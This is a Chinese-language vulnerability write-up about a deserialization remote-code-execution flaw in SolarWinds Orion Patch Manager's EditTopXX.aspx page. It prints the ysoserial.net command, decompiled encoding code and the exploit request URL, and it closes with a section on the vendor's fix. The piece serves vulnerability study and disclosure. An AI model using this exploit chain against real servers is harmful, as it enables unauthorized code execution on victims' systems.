分析

同样是把用户可控的请求参数直接交给 Serializer.Deserialize&lt;T&gt;(string serializedObject) 反序列化。

漏洞位于 SolarWinds\Orion\PM\Controls\EditResourceControls\EditTopXX.aspx.cs

1.png

同样调用 binaryformatter

2.png

用 ysoserial.net 生成的 payload 可以直接打。需要注意这里只能通过 GET 请求把 payload 放在 URL 参数里发送，受 URL 长度限制，所以要加 --minify 生成尽量小的 payload。

1ysoserial.exe -f binaryformatter -g  RolePrincipal --minify -c "ping localhost -t"

然后按照目标程序 Base64Helper.Base64Encode 的方式编码：ysoserial 输出的 Base64 字符串先取 UTF-8 字节，再做 UrlTokenEncode（参考下面从目标程序反编译出来的 Serializer 和 Base64Helper，前面的 HomeController 只是用来生成编码后 payload 的辅助代码）。

 1using System;
 2using System.IO;
 3using System.Runtime.Serialization.Formatters.Binary;
 4using System.Text;
 5using System.Web;
 6using System.Web.Mvc;
 7
 8namespace WebApplication1.Controllers
 9{
10    public class HomeController : Controller
11    {
12        public ActionResult Index()
13        {
14            var payload = HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(
15                "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"));
16            Response.Write(payload);
17            return View();
18        }
19    }
20
21    public class Serializer
22    {
23        // Token: 0x06000295 RID: 661 RVA: 0x0000B64C File Offset: 0x0000984C
24        public static string Serialize(object parameters)
25        {
26            string result;
27            using (MemoryStream memoryStream = new MemoryStream())
28            {
29                new BinaryFormatter().Serialize(memoryStream, parameters);
30                result = Base64Helper.Base64Encode(memoryStream.ToArray());
31            }
32
33            return result;
34        }
35
36        // Token: 0x06000295 RID: 661 RVA: 0x0000B7E8 File Offset: 0x000099E8
37        public static T Deserialize<T>(string serializedObject)
38        {
39            T result;
40            using (Stream stream = new MemoryStream(Base64Helper.Base64Decode(serializedObject)))
41            {
42                result = (T) ((object) new BinaryFormatter().Deserialize(stream));
43            }
44
45            return result;
46        }
47    }
48
49    internal class Base64Helper
50    {
51        // Token: 0x060002AC RID: 684 RVA: 0x0000C819 File Offset: 0x0000AA19
52        public static string Base64Encode(byte[] str)
53        {
54            return HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes(Convert.ToBase64String(str)));
55        }
56
57        // Token: 0x060002AD RID: 685 RVA: 0x0000C830 File Offset: 0x0000AA30
58        public static byte[] Base64Decode(string str)
59        {
60            byte[] bytes = HttpServerUtility.UrlTokenDecode(str);
61            return Convert.FromBase64String(Encoding.UTF8.GetString(bytes));
62        }
63    }
64}

构造请求如下

1http://192.168.137.130:8787/Orion/PM/Controls/EditResourceControls/EditTopXX.aspx?ThwackData=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

RCE

3.png

问了@Jang,他说不记得具体是哪个CVE编号了,但这个洞也是他提交的,也是在35216到35218这一批中的。

修复

4.png

修复后改用 DataContractSerializer 处理序列化，并通过 KnownTypes 限定允许反序列化的类型。需要注意这类修复的关键在于类型白名单必须是代码里固定的、不能由请求内容决定；如果仍然让输入来指定要实例化的类型，单纯换一个序列化器并不能消除风险。

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。